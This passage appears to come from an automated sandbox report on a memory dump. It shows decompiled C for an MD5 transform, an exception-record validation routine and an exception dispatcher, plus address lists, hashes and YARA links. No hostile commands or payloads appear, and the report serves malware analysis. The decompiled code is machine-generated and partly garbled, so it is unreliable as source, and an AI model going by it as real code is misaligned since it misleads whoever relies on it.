				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x04f62d6b
0x04f62d76
0x04f62d79
0x04f62d7c
0x04f62d7d
0x04f62d7d
0x04f62d88
0x04f62d99
0x04f62d9b
0x04f62d9e
0x04f62d9e
0x04f62da1
0x04f62da1
0x04f62da4
0x04f62da4
0x04f62da7
0x04f62da7
0x04f62dc4
0x04f62dc7
0x04f62ddd
0x04f62de0
0x04f62dfa
0x04f62dfd
0x04f62e13
0x04f62e16
0x04f62e18
0x04f62e30
0x04f62e33
0x04f62e36
0x04f62e4e
0x04f62e51
0x04f62e6b
0x04f62e6e
0x04f62e84
0x04f62e87
0x04f62e89
0x04f62ea1
0x04f62ea6
0x04f62ea9
0x04f62ebf
0x04f62ec2
0x04f62edc
0x04f62edf
0x04f62ef5
0x04f62ef8
0x04f62efa
0x04f62f15
0x04f62f18
0x04f62f2f
0x04f62f32
0x04f62f36
0x04f62f4f
0x04f62f52
0x04f62f54
0x04f62f57
0x04f62f72
0x04f62f75
0x04f62f8e
0x04f62f91
0x04f62fa1
0x04f62fa4
0x04f62fbc
0x04f62fbf
0x04f62fd9
0x04f62fdc
0x04f62ff4
0x04f62ff7
0x04f6300d
0x04f63010
0x04f63028
0x04f6302b
0x04f63043
0x04f63046
0x04f63060
0x04f63063
0x04f63079
0x04f6307c
0x04f63094
0x04f63097
0x04f630b1
0x04f630b4
0x04f630cc
0x04f630cf
0x04f630e5
0x04f630e8
0x04f63100
0x04f63103
0x04f6311b
0x04f6311e
0x04f63130
0x04f63133
0x04f63145
0x04f63148
0x04f6315a
0x04f6315d
0x04f63161
0x04f63171
0x04f63174
0x04f63182
0x04f63185
0x04f63197
0x04f6319a
0x04f631ae
0x04f631b1
0x04f631b3
0x04f631c3
0x04f631c6
0x04f631d8
0x04f631db
0x04f631e9
0x04f631ec
0x04f631fe
0x04f63201
0x04f63205
0x04f63215
0x04f63218
0x04f6322a
0x04f6322d
0x04f6323b
0x04f6323e
0x04f63250
0x04f63253
0x04f63265
0x04f63268
0x04f6327c
0x04f6327f
0x04f63293
0x04f63296
0x04f632aa
0x04f632ad
0x04f632c1
0x04f632c4
0x04f632d8
0x04f632db
0x04f632ef
0x04f632f4
0x04f63306
0x04f63309
0x04f6331d
0x04f63320
0x04f63334
0x04f63337
0x04f6334d
0x04f63350
0x04f63364
0x04f63367
0x04f63379
0x04f6337c
0x04f63390
0x04f63393
0x04f633a7
0x04f633aa
0x04f633be
0x04f633c7
0x04f633ca
0x04f633d3
0x04f633dc
0x04f633e4
0x04f633ec
0x04f633f6
0x04f6340b

APIs

memset.NTDLL ref: 04F633FF

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 0a759761f7766bacc9d548217659e3ce98ce8c81778eb0ca3df1597989a173dd
Instruction ID: c240754eb3b952ce5ec320d9514ec7db83bc866e5a781164669d9e4beb767acc
Opcode Fuzzy Hash: 0a759761f7766bacc9d548217659e3ce98ce8c81778eb0ca3df1597989a173dd
Instruction Fuzzy Hash: DC22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 04F6B105, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F6B105(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4f6d288; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4f6d2d0 = 1;
										__eflags =  *0x4f6d2d0;
										if( *0x4f6d2d0 != 0) {
											goto L60;
										}
										_t84 =  *0x4f6d288; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4f6d2d0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4f6d288 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x4f6d290 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4f6d28c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x4f6d290 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4f6d290 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4f6d2d0 = 1;
							__eflags =  *0x4f6d2d0;
							if( *0x4f6d2d0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x4f6d290 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x4f6d290 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4f6d2d0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x4f6d290 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4f6d288 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x4f6d290 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4f6d290 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x04f6b10f
0x04f6b112
0x04f6b118
0x04f6b136
0x00000000
0x04f6b136
0x04f6b120
0x04f6b129
0x04f6b12f
0x04f6b13e
0x04f6b141
0x04f6b144
0x04f6b14e
0x04f6b14e
0x04f6b150
0x04f6b153
0x04f6b155
0x04f6b155
0x04f6b157
0x04f6b15a
0x00000000
0x00000000
0x04f6b15c
0x04f6b15e
0x04f6b1c4
0x04f6b1c4
0x04f6b322
0x00000000
0x04f6b322
0x04f6b160
0x04f6b160
0x04f6b164
0x04f6b166
0x04f6b166
0x04f6b166
0x04f6b166
0x04f6b169
0x04f6b16a
0x04f6b16d
0x04f6b16d
0x04f6b171
0x04f6b175
0x04f6b183
0x04f6b183
0x04f6b18b
0x04f6b191
0x04f6b193
0x04f6b195
0x04f6b1a5
0x04f6b1b2
0x04f6b1b6
0x04f6b1bb
0x04f6b1bd
0x04f6b23b
0x04f6b23b
0x04f6b1bf
0x04f6b1bf
0x04f6b1bf
0x04f6b23d
0x04f6b23f
0x04f6b320
0x04f6b320
0x00000000
0x04f6b245
0x04f6b245
0x04f6b24c
0x00000000
0x00000000
0x04f6b252
0x04f6b256
0x04f6b2b2
0x04f6b2b4
0x04f6b2bc
0x04f6b2be
0x04f6b2c0
0x00000000
0x00000000
0x04f6b2c2
0x04f6b2c8
0x04f6b2ca
0x04f6b2cc
0x04f6b2e1
0x04f6b2e1
0x04f6b2e3
0x04f6b312
0x04f6b319
0x00000000
0x04f6b319
0x04f6b2e7
0x04f6b2e8
0x04f6b2ea
0x04f6b2ec
0x04f6b2ec
0x04f6b2ee
0x04f6b2f0
0x04f6b2f2
0x04f6b306
0x04f6b306
0x04f6b309
0x04f6b30b
0x04f6b30b
0x04f6b30c
0x04f6b30c
0x00000000
0x04f6b2f4
0x04f6b2f4
0x04f6b2f4
0x04f6b2fd
0x04f6b2fe
0x04f6b300
0x04f6b302
0x04f6b302
0x00000000
0x04f6b2f4
0x04f6b2f2
0x04f6b2ce
0x04f6b2d5
0x04f6b2d5
0x04f6b2d7
0x00000000
0x00000000
0x04f6b2d9
0x04f6b2da
0x04f6b2dd
0x04f6b2df
0x00000000
0x00000000
0x00000000
0x04f6b2df
0x00000000
0x04f6b2d5
0x04f6b258
0x04f6b25b
0x04f6b260
0x00000000
0x00000000
0x04f6b269
0x04f6b26b
0x04f6b271
0x00000000
0x00000000
0x04f6b277
0x04f6b27d
0x00000000
0x00000000
0x04f6b283
0x04f6b285
0x04f6b28e
0x04f6b292
0x00000000
0x00000000
0x04f6b298
0x04f6b29b
0x04f6b29d
0x00000000
0x00000000
0x04f6b2a4
0x04f6b2a6
0x00000000
0x00000000
0x04f6b2a8
0x04f6b2ac
0x00000000
0x00000000
0x00000000
0x04f6b2ac
0x00000000
0x00000000
0x00000000
0x04f6b197
0x04f6b197
0x04f6b197
0x04f6b19e
0x00000000
0x00000000
0x04f6b1a0
0x04f6b1a1
0x04f6b1a3
0x00000000
0x00000000
0x00000000
0x04f6b1a3
0x04f6b1cb
0x04f6b1cd
0x00000000
0x00000000
0x04f6b1dd
0x04f6b1df
0x04f6b1e1
0x00000000
0x00000000
0x04f6b1e7
0x04f6b1ee
0x04f6b21a
0x04f6b21a
0x04f6b21c
0x04f6b21e
0x04f6b232
0x04f6b234
0x00000000
0x00000000
0x00000000
0x00000000
0x04f6b220
0x04f6b220
0x04f6b220
0x04f6b229
0x04f6b22a
0x04f6b22c
0x04f6b22e
0x04f6b22e
0x00000000
0x04f6b220
0x04f6b1f0
0x04f6b1f0
0x04f6b1f3
0x04f6b1f5
0x04f6b207
0x04f6b207
0x04f6b20a
0x04f6b20c
0x04f6b20c
0x04f6b20d
0x04f6b20d
0x04f6b213
0x04f6b213
0x00000000
0x00000000
0x00000000
0x00000000
0x04f6b1f7
0x04f6b1f7
0x04f6b1f7
0x04f6b1fe
0x00000000
0x00000000
0x04f6b200
0x04f6b200
0x04f6b201
0x00000000
0x00000000
0x00000000
0x04f6b201
0x04f6b203
0x04f6b205
0x04f6b218
0x00000000
0x00000000
0x00000000
0x04f6b218
0x00000000
0x04f6b205
0x04f6b177
0x04f6b17a
0x04f6b17d
0x00000000
0x00000000
0x04f6b17f
0x04f6b181
0x00000000
0x00000000
0x00000000
0x04f6b181
0x04f6b146
0x04f6b148
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04F6B1B6

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 70af1475c1732936405d5491e64749ff42471349db8ae5d2a80e1bb159eb3ae7
Instruction ID: d66f9a40b2085970c1b11745f53cdaf15a7b0782bd4bb7a708b518fea135642e
Opcode Fuzzy Hash: 70af1475c1732936405d5491e64749ff42471349db8ae5d2a80e1bb159eb3ae7
Instruction Fuzzy Hash: 89619431B00629AFEB26CE2DD99063973E5EB85358F248569D517C7298E730F847CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04F6AEE4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E04F6AEE4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E04F6B04B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E04F6B105(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E04F6AFF0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E04F6B04B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E04F6B0E7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x04f6aee8
0x04f6aee9
0x04f6aeea
0x04f6aeed
0x04f6aeef
0x04f6aef2
0x04f6aef3
0x04f6aef5
0x04f6aef6
0x04f6aef7
0x04f6aefa
0x04f6af04
0x04f6afb5
0x04f6afbc
0x04f6afc5
0x04f6af0a
0x04f6af0a
0x04f6af10
0x04f6af16
0x04f6af19
0x04f6af1c
0x04f6af20
0x04f6af25
0x04f6af2a
0x04f6afaa
0x00000000
0x04f6af2c
0x04f6af2c
0x04f6af38
0x04f6af3a
0x04f6af95
0x04f6af95
0x04f6af9b
0x00000000
0x04f6af3c
0x04f6af4b
0x04f6af4d
0x04f6af4e
0x04f6af4f
0x04f6af52
0x04f6af52
0x04f6af54
0x00000000
0x04f6af56
0x04f6af56
0x04f6afa0
0x04f6af58
0x04f6af58
0x04f6af5c
0x04f6af64
0x04f6af69
0x04f6af6e
0x04f6af7a
0x04f6af82
0x04f6af89
0x04f6af8f
0x04f6af93
0x00000000
0x04f6af93
0x04f6af56
0x04f6af54
0x00000000
0x04f6af3a
0x04f6afae
0x04f6afae
0x04f6afae
0x04f6af2a
0x04f6afca
0x04f6afd1

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 0d5848f2c9a486a6e8e53c5ae7fd8e2a523dc04fb19ba90d0eecd605ec0586d5
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 19217472D00214AFDB14DF68CC809A7BBA5BF45350B4A8168D956DB249EB30F916CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 04F62201, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 223
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E04F62201(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v44;
				void* __ecx;
				void* __edi;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				int _t43;
				void* _t44;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr* _t69;
				intOrPtr _t75;
				intOrPtr _t81;
